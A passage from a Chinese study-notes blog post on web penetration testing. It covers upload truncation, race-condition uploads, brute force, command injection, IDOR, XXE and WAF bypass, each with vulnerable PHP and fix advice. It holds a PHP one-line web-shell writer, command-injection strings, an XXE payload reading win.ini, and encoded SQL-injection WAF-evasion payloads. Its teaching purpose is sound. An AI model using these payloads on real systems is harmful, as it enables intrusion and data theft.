class="comment">//此处存疑，是否已经截断了文件名</span></span><br><span class="line">	<span class="keyword">if</span>(in_array($file_ext, $ext_arr))&#123;</span><br><span class="line">        $tmpFile = $_FILES[<span class="string">"file"</span>][<span class="string">"tmp_name"</span>];</span><br><span class="line">        $targetPath = upload/<span class="string">".$_REQUEST["</span>jieduan<span class="string">"].rand(10,99),date("</span>YmdHis<span class="string">")."</span>.<span class="string">".$file_ext;</span></span><br><span class="line"><span class="string">    	...... //这里的直接对jieduan参数进行处理，就存在%00截断绕过漏洞</span></span><br><span class="line"><span class="string">    &#125;</span></span><br><span class="line"><span class="string">?&gt;</span></span><br></pre></td></tr></table></figure>
<h4 id="竞争条件攻击"><a href="#竞争条件攻击" class="headerlink" title="竞争条件攻击"></a>竞争条件攻击</h4><p>一些网站先允许上传任意文件，再判定是否是shell然后若是就删除，但是有一定时间差，所以存在漏洞。</p>
<p>攻击者先上传一个1.php，用来生成另一个shell.php</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">	fputs(fopen(&quot;../shell.php&quot;,&apos;w&apos;),&quot;&lt;?php @eval($_POST[a]) ?&gt;&quot;)</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p>上传上去后，客户端立即访问1.php，此时就会生成shell.php，也就是利用时间差。</p>
<h5 id="代码分析-5"><a href="#代码分析-5" class="headerlink" title="代码分析"></a>代码分析</h5><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php </span><br><span class="line">	if(file_exists(&quot;upload/&quot;/$_FILES[&quot;file&quot;][&quot;name&quot;]))&#123;</span><br><span class="line">		echo $_FILES[&quot;file&quot;][&quot;name&quot;].&apos;already exists.&apos;;</span><br><span class="line">	&#125;</span><br><span class="line">	else&#123;</span><br><span class="line">		move_uploaded_file($_FILES[&quot;file&quot;][&quot;tmp_name&quot;],&quot;upload/&quot;.$_FILES[&quot;file&quot;][&quot;name&quot;]);</span><br><span class="line">		sleep(&quot;10&quot;);</span><br><span class="line">		//判断是否为shell，是则删除</span><br><span class="line">		unlink(&quot;upload/&quot;.$_FILES[&quot;file&quot;][&quot;name&quot;]);</span><br><span class="line">	&#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<h4 id="修复建议-2"><a href="#修复建议-2" class="headerlink" title="修复建议"></a>修复建议</h4><ul>
<li>白名单方式判断文件后缀是否合法</li>
<li>对上传后的文件进行重命名，例如rand(10,99).date(‘YmdHis’).”jpg”（高版本的php）</li>
</ul>
<h3 id="暴力破解"><a href="#暴力破解" class="headerlink" title="暴力破解"></a>暴力破解</h3><h4 id="简介-4"><a href="#简介-4" class="headerlink" title="简介"></a>简介</h4><p>服务器没有对登录次数做限制，所以可以通过字典去猜解密码</p>
<p>利用burp的intruder进行爆破，之前有过使用方式</p>
<h4 id="代码分析-6"><a href="#代码分析-6" class="headerlink" title="代码分析"></a>代码分析</h4><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>( <span class="keyword">isset</span>( $_GET[<span class="string">'Login'</span>] ) ) &#123;</span><br><span class="line"></span><br><span class="line">    $user = $_GET[<span class="string">'username'</span>];</span><br><span class="line">    </span><br><span class="line">    $pass = $_GET[<span class="string">'password'</span>];</span><br><span class="line">    $pass = md5($pass);</span><br><span class="line"></span><br><span class="line">    $qry = <span class="string">"SELECT * FROM `users` WHERE user='$user' AND password='$pass';"</span>;</span><br><span class="line">    $result = mysql_query( $qry ) <span class="keyword">or</span> <span class="keyword">die</span>( <span class="string">'&lt;pre&gt;'</span> . mysql_error() . <span class="string">'&lt;/pre&gt;'</span> );</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span>( $result &amp;&amp; mysql_num_rows( $result ) == <span class="number">1</span> ) &#123;</span><br><span class="line">        <span class="comment">// Get users details</span></span><br><span class="line">        $i=<span class="number">0</span>; <span class="comment">// Bug fix.</span></span><br><span class="line">        $avatar = mysql_result( $result, $i, <span class="string">"avatar"</span> );</span><br><span class="line"></span><br><span class="line">        <span class="comment">// Login Successful</span></span><br><span class="line">        <span class="keyword">echo</span> <span class="string">"&lt;p&gt;Welcome to the password protected area "</span> . $user . <span class="string">"&lt;/p&gt;"</span>;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">'&lt;img src="'</span> . $avatar . <span class="string">'" /&gt;'</span>;</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="comment">//Login failed</span></span><br><span class="line">        <span class="keyword">echo</span> <span class="string">"&lt;pre&gt;&lt;br&gt;Username and/or password incorrect.&lt;/pre&gt;"</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    mysql_close();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>未对登陆次数、密码验证、验证码做限制</p>
<h4 id="修复建议-3"><a href="#修复建议-3" class="headerlink" title="修复建议"></a>修复建议</h4><ul>
<li>限制账号登陆次数</li>
<li>限制IP登陆次数（百度云？？？）</li>
</ul>
<h3 id="命令执行"><a href="#命令执行" class="headerlink" title="命令执行"></a>命令执行</h3><h4 id="简介-5"><a href="#简介-5" class="headerlink" title="简介"></a>简介</h4><p>程序有时候调用一些执行系统命令的函数，如php中的system、exec、shell_exec、passthru、popen、proc_popen，若输入参数可以让用户接触到，就有风险</p>
<p>比如ping操作，允许你输入ip：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">#若通过管道输入一些命令行语句就会导致直接与shell进行交互</span><br><span class="line">ping 120.0.0.1 | ls -al</span><br><span class="line"></span><br><span class="line">#如windows下的</span><br><span class="line">ping 127.0.0.1 | whoami #单管道直接执行后面语句</span><br><span class="line">ping 2 || whoami #双管道是前面执行出错时候执行（测试了我的powershell，已经没有双管道了） </span><br><span class="line">ping 127.0.0.1 &amp; whoami #前面语句为假直接执行后面的，类似于or</span><br><span class="line">ping 127.0.0.1 &amp;&amp; whoami #前面为假后面也不执行</span><br><span class="line"></span><br><span class="line">#linux下的</span><br><span class="line">ping 127.0.0.1;whoami #先后执行</span><br><span class="line">ping 127.0.0.1 | whoami #显示后面的结果</span><br><span class="line">ping 12 || whoami #前面执行出错，执行后面的</span><br><span class="line">ping 127.0.0.1 &amp; whoami #同win</span><br><span class="line">ping 127.0.0.1 &amp;&amp; whoami #同win</span><br></pre></td></tr></table></figure>
<h4 id="代码分析-7"><a href="#代码分析-7" class="headerlink" title="代码分析"></a>代码分析</h4><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">	<span class="keyword">echo</span> system(<span class="string">"ping -n 2 "</span>.$_GET[<span class="string">'ip'</span>]);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>这也太随意了</p>
<h4 id="修复建议-4"><a href="#修复建议-4" class="headerlink" title="修复建议"></a>修复建议</h4><ul>
<li>尽量不要使用命令执行函数</li>
<li>客户端提交的变量在执行命令函数前做好过滤和检测</li>
<li>使用动态函数之前，确保使用的函数是指定的函数之一</li>
<li>对PHP来说，不能完全控制的危险函数最好别用（这里挖坑，好像在看雪峰会上听到过，那时候哪里懂）</li>
</ul>
<h3 id="逻辑漏洞挖掘"><a href="#逻辑漏洞挖掘" class="headerlink" title="逻辑漏洞挖掘"></a>逻辑漏洞挖掘</h3><h4 id="简介-6"><a href="#简介-6" class="headerlink" title="简介"></a>简介</h4><p>指利用业务的设计缺陷，获取敏感信息或破坏业务完整性，常见问题有：密码修改、越权访问、密码找回、交易支付金额的位置。其中越权访问分为：</p>
<ul>
<li>水平越权：相同级别用户或同一角色的不同用户间，可以越权访问、修改或删除其他用户信息的非法操作，形象化记忆，截胡</li>
<li>垂直越权：不同级别之间的用户或不同角色的越权，比如用户执行管理员的功能，扮猪吃老虎</li>
</ul>
<p>所以要特别注意架构、开发者逻辑上的的隐藏错误，做出一些假设通过两个方式去验证：业务流程、HTTP/HTTPS请求篡改。</p>
<p>常见逻辑漏洞：</p>
<ul>
<li>支付订单：篡改价格为任意价格（蓐羊毛）、</li>
<li>越权访问：通过越权漏洞访问他人信息或者操纵他人账号</li>
<li>重置密码：1. 利用session覆盖重置密码（这个特逗，两个号同时改密码，一个到最后一步确认修改密码，然后另一个先验证手机打住，此时第一个账号点击重置密码，第二个账号的密码却被改了，说明session被第二个账号覆盖了，实际危害是若攻击者拿到session就可以当时重置密码） 2. 短信验证码直接在返回的数据包里</li>
<li>竞争条件：1. 前面的文件上传漏洞 2. 10块余额同时多线程买5+6块的东西，正常情况失败，但也有可能购买成功只花了6块或5块，或者余额变成-1（这个就解释了为啥阴阳师、不休的乌拉拉某些代充的账号现在是负的了）</li>
</ul>
<h4 id="越权访问攻击"><a href="#越权访问攻击" class="headerlink" title="越权访问攻击"></a>越权访问攻击</h4><p>比如</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">http://xxx.com/test_yuequan.php?id=1</span><br><span class="line">#改为</span><br><span class="line">http://xxx.com/test_yuequan.php?id=2</span><br><span class="line">#就能访问id为2的用户信息了（这是完全没搞session的节奏，有点像我们当时做的图书管理系统）</span><br></pre></td></tr></table></figure>
<h5 id="代码分析-8"><a href="#代码分析-8" class="headerlink" title="代码分析"></a>代码分析</h5><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_GET[<span class="string">'username'</span>]))&#123;</span><br><span class="line">	... <span class="comment">//查询操作</span></span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">	$username = $_POST[<span class="string">'username'</span>];</span><br><span class="line">	$password = $_POST[<span class="string">'password'</span>];</span><br><span class="line">	$result = mysqli_query($con,<span class="string">"select * from users where `username` ='"</span>.addslashes($username).<span class="string">"' and `password` = '"</span>.addslashes($password).<span class="string">"'"</span> <span class="string">"); </span></span><br><span class="line"><span class="string">	$row = mysqli_fetch_array($result);</span></span><br><span class="line"><span class="string">	if($row)&#123;</span></span><br><span class="line"><span class="string">		exit("</span>登录成功<span class="string">"."</span>&lt;a href=<span class="string">"login.php?username="</span>.$username.<span class="string">"'&gt;个人信息&lt;/a&gt;"</span>);</span><br><span class="line">    	<span class="comment">#这里登录成功时候直接跳转到一个url，但如果有人直接访问这个url并猜到一个用户名是不是就能直接访问页面了</span></span><br><span class="line">	&#125;<span class="keyword">else</span>&#123; </span><br><span class="line">    	<span class="keyword">exit</span>(<span class="string">"登录失败"</span>);</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>php里的<code>.</code>是连接运算符，用来连接符号左右的两个字符串，三种形式</p>
<ol>
<li><code>$a.$a</code> </li>
<li><code>&quot;a&quot;.$a</code> </li>
<li><code>&quot;字符串1&quot;.$a.&quot;字符串2&quot;</code> </li>
</ol>
<p>而这里是”.$xxx.”显然是第三种（php设计者这点<del>让第一次看代码的人有点懵</del>很好很简明）</p>
<p>而<code>.=</code>类似c语言里的<code>+=</code> 就是给给变量后添加上一串字符串。</p>
<p>这里插播一下GET和POST的区别，真的每次都会忘，因为理解的不深不全所以才会对自己的记忆产生怀疑。</p>
<h5 id="GET-和-POST"><a href="#GET-和-POST" class="headerlink" title="GET 和 POST"></a>GET 和 POST</h5><p>当我们谈GET和POST时候我们在谈什么？主要有两个场景：</p>
<ol>
<li><p>浏览器的GET和POST，特指非Ajax的http请求，浏览器通过GET请求获取一个资源，用POST来提交一个form表单，简单地形容就是GET是一个读取操作，所以可以对这个操作进行缓存；而POST是提交参数让服务器做一件事，所以无法缓存，而且重复提交会有副作用。</p>
<p>所以表现为，GET的url带参数，body没有参数；POST的url通常不带参数，body里有参数。</p>
</li>
<li><p>接口中的GET和POST，指通过浏览器的Ajax api，或安卓、ios的http client，java的commons-httpclient，或curl这样的命令中，也就是协议中通过接口发送请求时候用到的，例如：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;METHOD&gt; &lt;URL&gt; HTTP/1.1</span><br></pre></td></tr></table></figure>
<p>这里就没有啥限制，什么GET没有body，POST的请求不能放URL里。但是为了统一规范处理，也有一套规范，比较著名的是REST规范，例如：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">GET https://xxx.com/books/:bookId</span><br><span class="line">POST  http://xxx.com/books&#123;</span><br><span class="line">	&quot;title&quot;: &quot;adafas&quot;,</span><br><span class="line">	&quot;content&quot;: &quot;adsfasf&quot;,</span><br><span class="line">	...</span><br><span class="line">&#125;</span><br><span class="line">#这里的POST和PUT的区别在于，PUT是REPLACE，一般用于需要完整更换资源的api，而POST可以用于id是自动生成的api</span><br></pre></td></tr></table></figure>
</li>
</ol>
<p>所以，综上我们一般说GET和POST都是指第一种情况，所以这两种方式的安全性都是差不多的，都是HTTP协议，数据包都是明文传播，POST其实只是可以不在url中暴露请求的参数，并没有实质性改善安全，所以端到端加密的https应运而生。（当然你要分享你的链接时候确实曝光的机会更大些）</p>
<p>然后是编码方式。理论上URL和BODY部分的编码方式应该相同。</p>
<p>一般url只支持<code>[a-zA-Z0-9$-_.+!*&#39;(),]</code>的字符集，但是url中如果有中文和特殊字符时，就需要percent encoding的编码方式（%31%21…之类的），再然而，如果浏览器没有统一用utf-8编码还是GBK，你输的中文在不同浏览器中可能有不同的解析发到后端不一定能解析（虽然现在基本都是utf-8）。所以一般都是在页面里输入，通过ajax发出。</p>
<p>而body部分有Content-Type控制，情况好些，例如：<code>Content-Type: application/x-www-form-urlencoded ; charset=UTF-8</code></p>
<h5 id="修复建议-5"><a href="#修复建议-5" class="headerlink" title="修复建议"></a>修复建议</h5><p>对用户身份进行判断控制，引入session，当用户去访问一个url时候，从session里取出用户名等信息，这样就不能访问别人的敏感信息了。</p>
<h3 id="XXE漏洞"><a href="#XXE漏洞" class="headerlink" title="XXE漏洞"></a>XXE漏洞</h3><h4 id="简介-7"><a href="#简介-7" class="headerlink" title="简介"></a>简介</h4><p>XML外部实体注入简称XXE，XML是一种标记语言，来标记数据定义数据类型。</p>
<h4 id="代码分析-9"><a href="#代码分析-9" class="headerlink" title="代码分析"></a>代码分析</h4><p>若没有禁用外部实体或对用户的输入数据进行过滤，则可能存在以下情况</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">#用户在http下post一个参数</span><br><span class="line">&lt;?xml version=&apos;1.0&apos;?&gt;</span><br><span class="line">&lt;!DOCTYPE a[</span><br><span class="line">	&lt;!ENTITY b SYSTEM &quot;file///c:/windows/win.ini&quot;&gt;</span><br><span class="line">]&gt;</span><br><span class="line">&lt;xml&gt;</span><br><span class="line">&lt;xxe&gt;&amp;b;&lt;/xxe&gt;</span><br><span class="line">&lt;/xml&gt;</span><br></pre></td></tr></table></figure>
<h4 id="防范建议"><a href="#防范建议" class="headerlink" title="防范建议"></a>防范建议</h4><ul>
<li>禁用外部实体，libxml_disable_entity_loader(true)</li>
<li>过滤用户提交的XML数据</li>
</ul>
<h3 id="WAF"><a href="#WAF" class="headerlink" title="WAF"></a>WAF</h3><h4 id="简介-8"><a href="#简介-8" class="headerlink" title="简介"></a>简介</h4><p>web应用防火墙</p>
<p>分为软件型（装服务器上）、硬件型（部署在链路，拦截恶意流量）、云WAF（反向代理，通过配置NS记录或CNAME记录，使报文先经过WAF主机，将无害的报文发给实际服务器，有点像CDN）、网站内置WAF（做好代码审计，安全开发方便你我他）</p>
<h4 id="判断WAF方法"><a href="#判断WAF方法" class="headerlink" title="判断WAF方法"></a>判断WAF方法</h4><h5 id="SQLMap-1"><a href="#SQLMap-1" class="headerlink" title="SQLMap"></a>SQLMap</h5><p>SQLMap自带的WAF识别模块，若没识别出来就是Generic</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">#法一，识别规则在waf目录的脚本里</span><br><span class="line">sqlmap.py -u &quot;http://xxx.com&quot;--identity.waf--batch </span><br><span class="line"></span><br><span class="line">#法二，手工判断，在url后面添加一个不存在的参数，若被拦截则存在waf</span><br><span class="line">http://192.168.234.178/dvwa/index.php?aaa= 1 union select 1,2,3 #</span><br></pre></td></tr></table></figure>
<h5 id="WAF绕过方式"><a href="#WAF绕过方式" class="headerlink" title="WAF绕过方式"></a>WAF绕过方式</h5><p>拿sql注入举例，其他都差不多</p>
<ol>
<li><p>大小写混合</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">UnioN SeLect 1,2,3,4,5</span><br></pre></td></tr></table></figure>
</li>
<li><p>URL编码</p>
<p>有些waf不对普通字符进行url解码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">union select 1,2,3,4,5#</span><br><span class="line">#被编码成下面这个，注意要选所有字符都编码</span><br><span class="line">%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%32%2c%33%2c%34%2c%35%23</span><br></pre></td></tr></table></figure>
<p>然后有时候waf只做一次解码所以可以二次编码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">%25%37%35%25%36%65%25%36%39%25%36%66%25%36%65%25%32%30%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%33%31%25%32%63%25%33%32%25%32%63%25%33%33%25%32%63%25%33%34%25%32%63%25%33%35%25%32%33</span><br></pre></td></tr></table></figure>
</li>
<li><p>替换关键词</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">uniunionon selselectect 1,2,3,4#</span><br></pre></td></tr></table></figure>
</li>
<li><p>使用注释（用注释代替空格）</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">union/*123*/select/*321*/1 , 2 , 3 , 4 , 5 #</span><br></pre></td></tr></table></figure>
</li>
<li><p>多参数请求拆分</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">and a=union/*and b=*/select 1, 2, 3, 4#</span><br></pre></td></tr></table></figure>
</li>
<li><p>HTTP参数污染</p>
<p>同一参数出现多次，不同的中间件会解析为不同结果</p>
</li>
</ol>

      
    </div>
    
    
    

    <div>
      
        
<div class="my_post_copyright">
  <script src="//cdn.bootcss.com/clipboard.js/1.5.10/clipboard.min.js"></script>

  <!-- JS库 sweetalert 可修改路径 -->
  <script src="https://cdn.bootcss.com/jquery/2.0.0/jquery.min.js"></script>
  <script src="https://unpkg.com/sweetalert/dist/sweetalert.min.js"></script>
  <p><span>本文标题:</span><a href="/blog/2020/01/10/21/">Web安全渗透测试攻防指南（一）</a></p>
  <p><span>文章作者:</span><a href="/" title="访问 ssilent 的个人博客">ssilent</a></p>
  <p><span>发布时间:</span>2020年01月10日 - 18:38</p>
  <p><span>最后更新:</span>2020年02月19日 - 20:13</p>
  <p><span>原始链接:</span><a href="/blog/2020/01/10/21/" title="Web安全渗透测试攻防指南（一）">https://catchmenow.gitee.io/blog/2020/01/10/21/</a>
    <span class="copy-path" title="点击复制文章链接"><i class="fa fa-clipboard" data-clipboard-text="https://catchmenow.gitee.io/blog/2020/01/10/21/" aria-label="复制成功！"></i></span>
  </p>
  <p><span>许可协议:</span><i class="fa fa-creative-commons"></i> <a rel="license" href="https://creativecommons.org/licenses/by-nc-nd/4.0/" target="_blank" title="Attribution-NonCommercial-NoDerivatives 4.0 International (CC BY-NC-ND 4.0)">署名-非商业性使用-禁止演绎 4.0 国际</a> 转载请保留原文链接及作者。</p>
</div>
<script>
    var clipboard = new Clipboard('.fa-clipboard');
    $(".fa-clipboard").click(function(){
      clipboard.on('success', function(){
        swal({
          title: "",
          text: '复制成功',
          icon: "success",
          showConfirmButton: true
          });
  });
    });
</script>

      
    </div>

    <div>
      
        <div>
    
        <div style="text-align:center;color: #ccc;font-size:14px;">-------------本文结束<i class="fa fa-heartbeat"></i>感谢您的阅读-------------</div>
    
</div>
      
    </div>

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/blog/tags/Web/" rel="tag"><i class="fa fa-tag"></i> Web</a>
          
            <a href="/blog/tags/渗透测试/" rel="tag"><i class="fa fa-tag"></i> 渗透测试</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/blog/2019/02/10/1/" rel="next" title="修改Tor源码的尝试">
                <i class="fa fa-chevron-left"></i> 修改Tor源码的尝试
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/blog/2020/01/31/1/" rel="prev" title="Splunk Fundamentals Part 1">
                Splunk Fundamentals Part 1 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  
    <div class="comments" id="comments">
    </div>
  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope="" itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="/blog/images/p2.jpg" alt="ssilent">
            
              <p class="site-author-name" itemprop="name">ssilent</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/blog/archives/">
              
                  <span class="site-state-item-count">8</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/blog/categories/index.html">
                  <span class="site-state-item-count">5</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/blog/tags/index.html">
                  <span class="site-state-item-count">7</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#信息收集"><span class="nav-number">1.</span> <span class="nav-text">信息收集</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#收集域名信息"><span class="nav-number">1.1.</span> <span class="nav-text">收集域名信息</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#搜集敏感信息"><span class="nav-number">1.2.</span> <span class="nav-text">搜集敏感信息</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#收集子域名"><span class="nav-number">1.3.</span> <span class="nav-text">收集子域名</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#收集端口信息"><span class="nav-number">1.4.</span> <span class="nav-text">收集端口信息</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#指纹识别"><span class="nav-number">1.5.</span> <span class="nav-text">指纹识别</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#寻找真实IP"><span class="nav-number">1.6.</span> <span class="nav-text">寻找真实IP</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#收集敏感目录文件"><span class="nav-number">1.7.</span> <span class="nav-text">收集敏感目录文件</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#社会工程学"><span class="nav-number">1.8.</span> <span class="nav-text">社会工程学</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#搭建渗透环境及实战"><span class="nav-number">2.</span> <span class="nav-text">搭建渗透环境及实战</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#Linux安装LANMP"><span class="nav-number">2.1.</span> <span class="nav-text">Linux安装LANMP</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#dvwa"><span class="nav-number">2.2.</span> <span class="nav-text">dvwa</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#sqli-labs"><span class="nav-number">2.3.</span> <span class="nav-text">sqli-labs</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#XSS测试平台"><span class="nav-number">2.4.</span> <span class="nav-text">XSS测试平台</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#常用渗透工具"><span class="nav-number">3.</span> <span class="nav-text">常用渗透工具</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#SQLMap"><span class="nav-number">3.1.</span> <span class="nav-text">SQLMap</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#SQLMap入门"><span class="nav-number">3.1.1.</span> <span class="nav-text">SQLMap入门</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#SQLMap进阶"><span class="nav-number">3.1.2.</span> <span class="nav-text">SQLMap进阶</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#BurpSuite"><span class="nav-number">3.2.</span> <span class="nav-text">BurpSuite</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#BurpSuite入门"><span class="nav-number">3.2.1.</span> <span class="nav-text">BurpSuite入门</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Nmap"><span class="nav-number">3.3.</span> <span class="nav-text">Nmap</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#Nmap入门"><span class="nav-number">3.3.1.</span> <span class="nav-text">Nmap入门</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Nmap进阶"><span class="nav-number">3.3.2.</span> <span class="nav-text">Nmap进阶</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Web安全原理"><span class="nav-number">4.</span> <span class="nav-text">Web安全原理</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#SQL注入"><span class="nav-number">4.1.</span> <span class="nav-text">SQL注入</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#SQL注入基础"><span class="nav-number">4.1.1.</span> <span class="nav-text">SQL注入基础</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#union注入攻击"><span class="nav-number">4.1.1.1.</span> <span class="nav-text">union注入攻击</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#Boolean注入攻击"><span class="nav-number">4.1.1.2.</span> <span class="nav-text">Boolean注入攻击</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#报错注入攻击"><span class="nav-number">4.1.1.3.</span> <span class="nav-text">报错注入攻击</span></a></li></ol></li><li class="nav-item nav-level-4"><a 